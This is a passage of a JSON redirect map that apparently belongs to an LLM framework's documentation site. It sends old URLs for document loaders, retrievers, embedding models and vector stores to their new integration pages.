"/docs/integrations/document_loaders/duckdb" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/email.html", "destination": "/docs/integrations/document_loaders/email" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/email", "destination": "/docs/integrations/document_loaders/email" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/embaas.html", "destination": "/docs/integrations/document_loaders/embaas" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/embaas", "destination": "/docs/integrations/document_loaders/embaas" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/epub.html", "destination": "/docs/integrations/document_loaders/epub" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/epub", "destination": "/docs/integrations/document_loaders/epub" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/evernote.html", "destination": "/docs/integrations/document_loaders/evernote" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/evernote", "destination": "/docs/integrations/document_loaders/evernote" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/excel.html", "destination": "/docs/integrations/document_loaders/excel" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/excel", "destination": "/docs/integrations/document_loaders/excel" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/facebook_chat.html", "destination": "/docs/integrations/document_loaders/facebook_chat" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/facebook_chat", "destination": "/docs/integrations/document_loaders/facebook_chat" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/fauna.html", "destination": "/docs/integrations/document_loaders/fauna" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/fauna", "destination": "/docs/integrations/document_loaders/fauna" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/figma.html", "destination": "/docs/integrations/document_loaders/figma" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/figma", "destination": "/docs/integrations/document_loaders/figma" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/git.html", "destination": "/docs/integrations/document_loaders/git" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/git", "destination": "/docs/integrations/document_loaders/git" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/gitbook.html", "destination": "/docs/integrations/document_loaders/gitbook" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/gitbook", "destination": "/docs/integrations/document_loaders/gitbook" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/github.html", "destination": "/docs/integrations/document_loaders/github" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/github", "destination": "/docs/integrations/document_loaders/github" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/google_bigquery.html", "destination": "/docs/integrations/document_loaders/google_bigquery" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/google_bigquery", "destination": "/docs/integrations/document_loaders/google_bigquery" }, { 
"source": "/en/latest/modules/indexes/document_loaders/examples/google_cloud_storage_directory.html", "destination": "/docs/integrations/document_loaders/google_cloud_storage_directory" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/google_cloud_storage_directory", "destination": "/docs/integrations/document_loaders/google_cloud_storage_directory" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/google_cloud_storage_file.html", "destination": "/docs/integrations/document_loaders/google_cloud_storage_file" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/google_cloud_storage_file", "destination": "/docs/integrations/document_loaders/google_cloud_storage_file" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/google_drive.html", "destination": "/docs/integrations/document_loaders/google_drive" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/google_drive", "destination": "/docs/integrations/document_loaders/google_drive" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/gutenberg.html", "destination": "/docs/integrations/document_loaders/gutenberg" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/gutenberg", "destination": "/docs/integrations/document_loaders/gutenberg" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/hacker_news.html", "destination": "/docs/integrations/document_loaders/hacker_news" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/hacker_news", "destination": "/docs/integrations/document_loaders/hacker_news" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/hugging_face_dataset.html", "destination": "/docs/integrations/document_loaders/hugging_face_dataset" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/hugging_face_dataset", "destination": "/docs/integrations/document_loaders/hugging_face_dataset" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/ifixit.html", "destination": "/docs/integrations/document_loaders/ifixit" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/ifixit", "destination": "/docs/integrations/document_loaders/ifixit" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/image.html", "destination": "/docs/integrations/document_loaders/image" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/image", "destination": "/docs/integrations/document_loaders/image" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/image_captions.html", "destination": "/docs/integrations/document_loaders/image_captions" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/image_captions", "destination": "/docs/integrations/document_loaders/image_captions" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/imsdb.html", "destination": "/docs/integrations/document_loaders/imsdb" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/imsdb", "destination": "/docs/integrations/document_loaders/imsdb" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/iugu.html", "destination": "/docs/integrations/document_loaders/iugu" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/iugu", "destination": "/docs/integrations/document_loaders/iugu" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/joplin.html", 
"destination": "/docs/integrations/document_loaders/joplin" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/joplin", "destination": "/docs/integrations/document_loaders/joplin" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/jupyter_notebook.html", "destination": "/docs/integrations/document_loaders/jupyter_notebook" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/jupyter_notebook", "destination": "/docs/integrations/document_loaders/jupyter_notebook" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/mastodon.html", "destination": "/docs/integrations/document_loaders/mastodon" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/mastodon", "destination": "/docs/integrations/document_loaders/mastodon" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/mediawikidump.html", "destination": "/docs/integrations/document_loaders/mediawikidump" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/mediawikidump", "destination": "/docs/integrations/document_loaders/mediawikidump" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/microsoft_onedrive.html", "destination": "/docs/integrations/document_loaders/microsoft_onedrive" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/microsoft_onedrive", "destination": "/docs/integrations/document_loaders/microsoft_onedrive" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/microsoft_powerpoint.html", "destination": "/docs/integrations/document_loaders/microsoft_powerpoint" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/microsoft_powerpoint", "destination": "/docs/integrations/document_loaders/microsoft_powerpoint" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/microsoft_word.html", "destination": "/docs/integrations/document_loaders/microsoft_word" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/microsoft_word", "destination": "/docs/integrations/document_loaders/microsoft_word" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/modern_treasury.html", "destination": "/docs/integrations/document_loaders/modern_treasury" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/modern_treasury", "destination": "/docs/integrations/document_loaders/modern_treasury" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/notion.html", "destination": "/docs/integrations/document_loaders/notion" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/notion", "destination": "/docs/integrations/document_loaders/notion" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/notiondb.html", "destination": "/docs/integrations/document_loaders/notiondb" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/notiondb", "destination": "/docs/integrations/document_loaders/notiondb" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/obsidian.html", "destination": "/docs/integrations/document_loaders/obsidian" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/obsidian", "destination": "/docs/integrations/document_loaders/obsidian" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/odt.html", "destination": "/docs/integrations/document_loaders/odt" }, { "source": 
"/docs/modules/data_connection/document_loaders/integrations/odt", "destination": "/docs/integrations/document_loaders/odt" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/pandas_dataframe.html", "destination": "/docs/integrations/document_loaders/pandas_dataframe" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/pandas_dataframe", "destination": "/docs/integrations/document_loaders/pandas_dataframe" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/psychic.html", "destination": "/docs/integrations/document_loaders/psychic" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/psychic", "destination": "/docs/integrations/document_loaders/psychic" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/pyspark_dataframe.html", "destination": "/docs/integrations/document_loaders/pyspark_dataframe" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/pyspark_dataframe", "destination": "/docs/integrations/document_loaders/pyspark_dataframe" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/readthedocs_documentation.html", "destination": "/docs/integrations/document_loaders/readthedocs_documentation" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/readthedocs_documentation", "destination": "/docs/integrations/document_loaders/readthedocs_documentation" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/reddit.html", "destination": "/docs/integrations/document_loaders/reddit" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/reddit", "destination": "/docs/integrations/document_loaders/reddit" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/roam.html", "destination": "/docs/integrations/document_loaders/roam" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/roam", "destination": "/docs/integrations/document_loaders/roam" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/sitemap.html", "destination": "/docs/integrations/document_loaders/sitemap" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/sitemap", "destination": "/docs/integrations/document_loaders/sitemap" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/slack.html", "destination": "/docs/integrations/document_loaders/slack" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/slack", "destination": "/docs/integrations/document_loaders/slack" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/snowflake.html", "destination": "/docs/integrations/document_loaders/snowflake" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/snowflake", "destination": "/docs/integrations/document_loaders/snowflake" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/spreedly.html", "destination": "/docs/integrations/document_loaders/spreedly" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/spreedly", "destination": "/docs/integrations/document_loaders/spreedly" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/stripe.html", "destination": "/docs/integrations/document_loaders/stripe" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/stripe", "destination": "/docs/integrations/document_loaders/stripe" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/subtitle.html", 
"destination": "/docs/integrations/document_loaders/subtitle" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/subtitle", "destination": "/docs/integrations/document_loaders/subtitle" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/telegram.html", "destination": "/docs/integrations/document_loaders/telegram" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/telegram", "destination": "/docs/integrations/document_loaders/telegram" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/tomarkdown.html", "destination": "/docs/integrations/document_loaders/tomarkdown" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/tomarkdown", "destination": "/docs/integrations/document_loaders/tomarkdown" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/toml.html", "destination": "/docs/integrations/document_loaders/toml" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/toml", "destination": "/docs/integrations/document_loaders/toml" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/trello.html", "destination": "/docs/integrations/document_loaders/trello" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/trello", "destination": "/docs/integrations/document_loaders/trello" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/twitter.html", "destination": "/docs/integrations/document_loaders/twitter" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/twitter", "destination": "/docs/integrations/document_loaders/twitter" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/unstructured_file.html", "destination": "/docs/integrations/document_loaders/unstructured_file" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/unstructured_file", "destination": "/docs/integrations/document_loaders/unstructured_file" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/url.html", "destination": "/docs/integrations/document_loaders/url" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/url", "destination": "/docs/integrations/document_loaders/url" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/weather.html", "destination": "/docs/integrations/document_loaders/weather" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/weather", "destination": "/docs/integrations/document_loaders/weather" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/web_base.html", "destination": "/docs/integrations/document_loaders/web_base" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/web_base", "destination": "/docs/integrations/document_loaders/web_base" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/whatsapp_chat.html", "destination": "/docs/integrations/document_loaders/whatsapp_chat" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/whatsapp_chat", "destination": "/docs/integrations/document_loaders/whatsapp_chat" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/wikipedia.html", "destination": "/docs/integrations/document_loaders/wikipedia" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/wikipedia", "destination": "/docs/integrations/document_loaders/wikipedia" }, { "source": 
"/en/latest/modules/indexes/document_loaders/examples/xml.html", "destination": "/docs/integrations/document_loaders/xml" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/xml", "destination": "/docs/integrations/document_loaders/xml" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/youtube_audio.html", "destination": "/docs/integrations/document_loaders/youtube_audio" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/youtube_audio", "destination": "/docs/integrations/document_loaders/youtube_audio" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/youtube_transcript.html", "destination": "/docs/integrations/document_loaders/youtube_transcript" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/youtube_transcript", "destination": "/docs/integrations/document_loaders/youtube_transcript" }, { "source": "/en/latest/modules/indexes/text_splitters/examples/markdown_header_metadata.html", "destination": "/docs/modules/data_connection/document_transformers/text_splitters/markdown_header_metadata" }, { "source": "/en/latest/modules/indexes/text_splitters.html", "destination": "/docs/modules/data_connection/document_transformers/" }, { "source": "/en/latest/modules/indexes/retrievers/examples/chroma_self_query.html", "destination": "/docs/modules/data_connection/retrievers/how_to/self_query/chroma_self_query" }, { "source": "/en/latest/modules/indexes/retrievers/examples/self_query.html", "destination": "/docs/modules/data_connection/retrievers/how_to/self_query/pinecone" }, { "source": "/en/latest/modules/indexes/retrievers/examples/qdrant_self_query.html", "destination": "/docs/modules/data_connection/retrievers/how_to/self_query/qdrant_self_query" }, { "source": "/en/latest/modules/indexes/retrievers/examples/weaviate_self_query.html", "destination": "/docs/modules/data_connection/retrievers/how_to/self_query/weaviate_self_query" }, { "source": "/en/latest/modules/indexes/retrievers/examples/arxiv.html", "destination": "/docs/integrations/retrievers/arxiv" }, { "source": "/docs/modules/data_connection/retrievers/integrations/arxiv", "destination": "/docs/integrations/retrievers/arxiv" }, { "source": "/en/latest/modules/indexes/retrievers/examples/azure_cognitive_search.html", "destination": "/docs/integrations/retrievers/azure_cognitive_search" }, { "source": "/docs/modules/data_connection/retrievers/integrations/azure_cognitive_search", "destination": "/docs/integrations/retrievers/azure_cognitive_search" }, { "source": "/en/latest/modules/indexes/retrievers/examples/chatgpt-plugin.html", "destination": "/docs/integrations/retrievers/chatgpt-plugin" }, { "source": "/docs/modules/data_connection/retrievers/integrations/chatgpt-plugin", "destination": "/docs/integrations/retrievers/chatgpt-plugin" }, { "source": "/en/latest/modules/indexes/retrievers/examples/cohere-reranker.html", "destination": "/docs/integrations/retrievers/cohere-reranker" }, { "source": "/docs/modules/data_connection/retrievers/integrations/cohere-reranker", "destination": "/docs/integrations/retrievers/cohere-reranker" }, { "source": "/en/latest/modules/indexes/retrievers/examples/databerry.html", "destination": "/docs/integrations/retrievers/chaindesk" }, { "source": "/docs/modules/data_connection/retrievers/integrations/chaindesk", "destination": "/docs/integrations/retrievers/chaindesk" }, { "source": "/docs/modules/data_connection/retrievers/integrations/databerry", "destination": 
"/docs/integrations/retrievers/chaindesk" }, { "source": "/docs/modules/data_connection/retrievers/integrations/chaindesk", "destination": "/docs/integrations/retrievers/chaindesk" }, { "source": "/en/latest/modules/indexes/retrievers/examples/elastic_search_bm25.html", "destination": "/docs/integrations/retrievers/elastic_search_bm25" }, { "source": "/docs/modules/data_connection/retrievers/integrations/elastic_search_bm25", "destination": "/docs/integrations/retrievers/elastic_search_bm25" }, { "source": "/en/latest/modules/indexes/retrievers/examples/knn.html", "destination": "/docs/integrations/retrievers/knn" }, { "source": "/docs/modules/data_connection/retrievers/integrations/knn", "destination": "/docs/integrations/retrievers/knn" }, { "source": "/en/latest/modules/indexes/retrievers/examples/merger_retriever.html", "destination": "/docs/integrations/retrievers/merger_retriever" }, { "source": "/docs/modules/data_connection/retrievers/integrations/merger_retriever", "destination": "/docs/integrations/retrievers/merger_retriever" }, { "source": "/en/latest/modules/indexes/retrievers/examples/metal.html", "destination": "/docs/integrations/retrievers/metal" }, { "source": "/docs/modules/data_connection/retrievers/integrations/metal", "destination": "/docs/integrations/retrievers/metal" }, { "source": "/en/latest/modules/indexes/retrievers/examples/pinecone_hybrid_search.html", "destination": "/docs/integrations/retrievers/pinecone_hybrid_search" }, { "source": "/docs/modules/data_connection/retrievers/integrations/pinecone_hybrid_search", "destination": "/docs/integrations/retrievers/pinecone_hybrid_search" }, { "source": "/en/latest/modules/indexes/retrievers/examples/pubmed.html", "destination": "/docs/integrations/retrievers/pubmed" }, { "source": "/docs/modules/data_connection/retrievers/integrations/pubmed", "destination": "/docs/integrations/retrievers/pubmed" }, { "source": "/en/latest/modules/indexes/retrievers/examples/svm.html", "destination": "/docs/integrations/retrievers/svm" }, { "source": "/docs/modules/data_connection/retrievers/integrations/svm", "destination": "/docs/integrations/retrievers/svm" }, { "source": "/en/latest/modules/indexes/retrievers/examples/tf_idf.html", "destination": "/docs/integrations/retrievers/tf_idf" }, { "source": "/docs/modules/data_connection/retrievers/integrations/tf_idf", "destination": "/docs/integrations/retrievers/tf_idf" }, { "source": "/en/latest/modules/indexes/retrievers/examples/vespa.html", "destination": "/docs/integrations/retrievers/vespa" }, { "source": "/docs/modules/data_connection/retrievers/integrations/vespa", "destination": "/docs/integrations/retrievers/vespa" }, { "source": "/en/latest/modules/indexes/retrievers/examples/weaviate-hybrid.html", "destination": "/docs/integrations/retrievers/weaviate-hybrid" }, { "source": "/docs/modules/data_connection/retrievers/integrations/weaviate-hybrid", "destination": "/docs/integrations/retrievers/weaviate-hybrid" }, { "source": "/en/latest/modules/indexes/retrievers/examples/wikipedia.html", "destination": "/docs/integrations/retrievers/wikipedia" }, { "source": "/docs/modules/data_connection/retrievers/integrations/wikipedia", "destination": "/docs/integrations/retrievers/wikipedia" }, { "source": "/en/latest/modules/indexes/retrievers/examples/zep_memorystore.html", "destination": "/docs/integrations/retrievers/zep_memorystore" }, { "source": "/docs/modules/data_connection/retrievers/integrations/zep_memorystore", "destination": 
"/docs/integrations/retrievers/zep_memorystore" }, { "source": "/en/latest/modules/models/text_embedding/examples/aleph_alpha.html", "destination": "/docs/integrations/text_embedding/aleph_alpha" }, { "source": "/docs/modules/data_connection/text_embedding/integrations/aleph_alpha", "destination": "/docs/integrations/text_embedding/aleph_alpha" }, { "source": "/en/latest/modules/models/text_embedding/examples/azureopenai.html", "destination": "/docs/integrations/text_embedding/azureopenai" }, { "source": "/docs/modules/data_connection/text_embedding/integrations/azureopenai", "destination": "/docs/integrations/text_embedding/azureopenai" }, { "source": "/en/latest/modules/models/text_embedding/examples/amazon_bedrock.html", "destination": "/docs/integrations/text_embedding/bedrock" }, { "source": "/docs/modules/data_connection/text_embedding/integrations/bedrock", "destination": "/docs/integrations/text_embedding/bedrock" }, { "source": "/en/latest/modules/models/text_embedding/examples/cohere.html", "destination": "/docs/integrations/text_embedding/cohere" }, { "source": "/docs/modules/data_connection/text_embedding/integrations/cohere", "destination": "/docs/integrations/text_embedding/cohere" }, { "source": "/en/latest/modules/models/text_embedding/examples/dashscope.html", "destination": "/docs/integrations/text_embedding/dashscope" }, { "source": "/docs/modules/data_connection/text_embedding/integrations/dashscope", "destination": "/docs/integrations/text_embedding/dashscope" }, { "source": "/en/latest/modules/models/text_embedding/examples/deepinfra.html", "destination": "/docs/integrations/text_embedding/deepinfra" }, { "source": "/docs/modules/data_connection/text_embedding/integrations/deepinfra", "destination": "/docs/integrations/text_embedding/deepinfra" }, { "source": "/en/latest/modules/models/text_embedding/examples/elasticsearch.html", "destination": "/docs/integrations/text_embedding/elasticsearch" }, { "source": "/docs/modules/data_connection/text_embedding/integrations/elasticsearch", "destination": "/docs/integrations/text_embedding/elasticsearch" }, { "source": "/en/latest/modules/models/text_embedding/examples/embaas.html", "destination": "/docs/integrations/text_embedding/embaas" }, { "source": "/docs/modules/data_connection/text_embedding/integrations/embaas", "destination": "/docs/integrations/text_embedding/embaas" }, { "source": "/en/latest/modules/models/text_embedding/examples/fake.html", "destination": "/docs/integrations/text_embedding/fake" }, { "source": "/docs/modules/data_connection/text_embedding/integrations/fake", "destination": "/docs/integrations/text_embedding/fake" }, { "source": "/en/latest/modules/models/text_embedding/examples/google_vertex_ai_palm.html", "destination": "/docs/integrations/text_embedding/google_vertex_ai_palm" }, { "source": "/docs/modules/data_connection/text_embedding/integrations/google_vertex_ai_palm", "destination": "/docs/integrations/text_embedding/google_vertex_ai_palm" }, { "source": "/en/latest/modules/models/text_embedding/examples/huggingface_hub.html", "destination": "/docs/integrations/text_embedding/huggingfacehub" }, { "source": "/docs/modules/data_connection/text_embedding/integrations/huggingfacehub", "destination": "/docs/integrations/text_embedding/huggingfacehub" }, { "source": "/en/latest/modules/models/text_embedding/examples/huggingface_instruct.html", "destination": "/docs/integrations/text_embedding/instruct_embeddings" }, { "source": 
"/docs/modules/data_connection/text_embedding/integrations/instruct_embeddings", "destination": "/docs/integrations/text_embedding/instruct_embeddings" }, { "source": "/en/latest/modules/models/text_embedding/examples/jina.html", "destination": "/docs/integrations/text_embedding/jina" }, { "source": "/docs/modules/data_connection/text_embedding/integrations/jina", "destination": "/docs/integrations/text_embedding/jina" }, { "source": "/en/latest/modules/models/text_embedding/examples/llamacpp.html", "destination": "/docs/integrations/text_embedding/llamacpp" }, { "source": "/docs/modules/data_connection/text_embedding/integrations/llamacpp", "destination": "/docs/integrations/text_embedding/llamacpp" }, { "source": "/en/latest/modules/models/text_embedding/examples/minimax.html", "destination": "/docs/integrations/text_embedding/minimax" }, { "source": "/docs/modules/data_connection/text_embedding/integrations/minimax", "destination": "/docs/integrations/text_embedding/minimax" }, { "source": "/en/latest/modules/models/text_embedding/examples/modelscope_hub.html", "destination": "/docs/integrations/text_embedding/modelscope_hub" }, { "source": "/docs/modules/data_connection/text_embedding/integrations/modelscope_hub", "destination": "/docs/integrations/text_embedding/modelscope_hub" }, { "source": "/en/latest/modules/models/text_embedding/examples/mosaicml.html", "destination": "/docs/integrations/text_embedding/mosaicml" }, { "source": "/docs/modules/data_connection/text_embedding/integrations/mosaicml", "destination": "/docs/integrations/text_embedding/mosaicml" }, { "source": "/en/latest/modules/models/text_embedding/examples/openai.html", "destination": "/docs/integrations/text_embedding/openai" }, { "source": "/docs/modules/data_connection/text_embedding/integrations/openai", "destination": "/docs/integrations/text_embedding/openai" }, { "source": "/en/latest/modules/models/text_embedding/examples/sagemaker-endpoint.html", "destination": "/docs/integrations/text_embedding/sagemaker-endpoint" }, { "source": "/docs/modules/data_connection/text_embedding/integrations/sagemaker-endpoint", "destination": "/docs/integrations/text_embedding/sagemaker-endpoint" }, { "source": "/en/latest/modules/models/text_embedding/examples/self-hosted.html", "destination": "/docs/integrations/text_embedding/self-hosted" }, { "source": "/docs/modules/data_connection/text_embedding/integrations/self-hosted", "destination": "/docs/integrations/text_embedding/self-hosted" }, { "source": "/en/latest/modules/models/text_embedding/examples/sentence_transformers.html", "destination": "/docs/integrations/text_embedding/sentence_transformers" }, { "source": "/docs/modules/data_connection/text_embedding/integrations/sentence_transformers", "destination": "/docs/integrations/text_embedding/sentence_transformers" }, { "source": "/en/latest/modules/models/text_embedding/examples/tensorflowhub.html", "destination": "/docs/integrations/text_embedding/tensorflowhub" }, { "source": "/docs/modules/data_connection/text_embedding/integrations/tensorflowhub", "destination": "/docs/integrations/text_embedding/tensorflowhub" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/analyticdb.html", "destination": "/docs/integrations/vectorstores/analyticdb" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/analyticdb", "destination": "/docs/integrations/vectorstores/analyticdb" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/annoy.html", "destination": 
"/docs/integrations/vectorstores/annoy" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/annoy", "destination": "/docs/integrations/vectorstores/annoy" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/atlas.html", "destination": "/docs/integrations/vectorstores/atlas" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/atlas", "destination": "/docs/integrations/vectorstores/atlas" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/awadb.html", "destination": "/docs/integrations/vectorstores/awadb" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/awadb", "destination": "/docs/integrations/vectorstores/awadb" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/azuresearch.html", "destination": "/docs/integrations/vectorstores/azuresearch" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/azuresearch", "destination": "/docs/integrations/vectorstores/azuresearch" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/chroma.html", "destination": "/docs/integrations/vectorstores/chroma" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/chroma", "destination": "/docs/integrations/vectorstores/chroma" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/deeplake.html", "destination": "/docs/integrations/vectorstores/deeplake" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/deeplake", "destination": "/docs/integrations/vectorstores/deeplake" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/docarray_hnsw.html", "destination": "/docs/integrations/vectorstores/docarray_hnsw" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/docarray_hnsw", "destination": "/docs/integrations/vectorstores/docarray_hnsw" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/docarray_in_memory.html", "destination": "/docs/integrations/vectorstores/docarray_in_memory" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/docarray_in_memory", "destination": "/docs/integrations/vectorstores/docarray_in_memory" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/faiss.html", "destination": "/docs/integrations/vectorstores/faiss" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/faiss", "destination": "/docs/integrations/vectorstores/faiss" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/hologres.html", "destination": "/docs/integrations/vectorstores/hologres" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/hologres", "destination": "/docs/integrations/vectorstores/hologres" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/lancedb.html", "destination": "/docs/integrations/vectorstores/lancedb" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/lancedb", "destination": "/docs/integrations/vectorstores/lancedb" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/matchingengine.html", "destination": "/docs/integrations/vectorstores/matchingengine" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/matchingengine", "destination": "/docs/integrations/vectorstores/matchingengine" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/milvus.html", "destination": "/docs/integrations/vectorstores/milvus" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/milvus", "destination": 
"/docs/integrations/vectorstores/milvus" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/mongodb_atlas_vector_search.html", "destination": "/docs/integrations/vectorstores/mongodb_atlas_vector_search" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/mongodb_atlas_vector_search", "destination": "/docs/integrations/vectorstores/mongodb_atlas_vector_search" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/myscale.html", "destination": "/docs/integrations/vectorstores/myscale" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/myscale", "destination": "/docs/integrations/vectorstores/myscale" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/opensearch.html", "destination": "/docs/integrations/vectorstores/opensearch" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/opensearch", "destination": "/docs/integrations/vectorstores/opensearch" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/pgvector.html", "destination": "/docs/integrations/vectorstores/pgvector" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/pgvector", "destination": "/docs/integrations/vectorstores/pgvector" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/pinecone.html", "destination": "/docs/integrations/vectorstores/pinecone" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/pinecone", "destination": "/docs/integrations/vectorstores/pinecone" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/qdrant.html", "destination": "/docs/integrations/vectorstores/qdrant" }, { "source": 